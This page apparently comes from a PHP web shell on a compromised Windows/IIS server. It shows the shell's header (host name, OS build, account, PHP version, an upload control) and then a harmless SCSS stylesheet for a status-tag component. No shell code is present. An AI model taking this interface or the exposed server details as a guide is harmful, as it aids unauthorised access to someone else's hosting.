HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
Upload Files
File: D:/HostingSpaces/SBogers10/shop.komma.nl/resources/sass/kms/Components/tag.scss
/* KMS styling */

.c-tag {
	display: inline-flex;
	align-items: center;
	padding: 4px 8px;
	font-size: 12px;
	line-height: 16px;
	font-weight: 600;
	border-radius: 500px;
	text-transform: uppercase;
	color: #4567AC;
	background-color: #D9E6FF;

	&::before {
		content: '';
		display: block;
		width: 4px;
		height: 4px;
		margin-right: 4px;
		border-radius: 50%;
		background-color: currentColor;
	}

	&[data-status="positive"] {
		color: #45AC51;
		background-color: #DEFFE2;
	}
	&[data-status="negative"] {
		color: #E64C2E;
		background-color: #FFDAD3;
	}
	&[data-status="pending"] {
		color: #E6A82E;
		background-color: #FFF0D3;
	}
}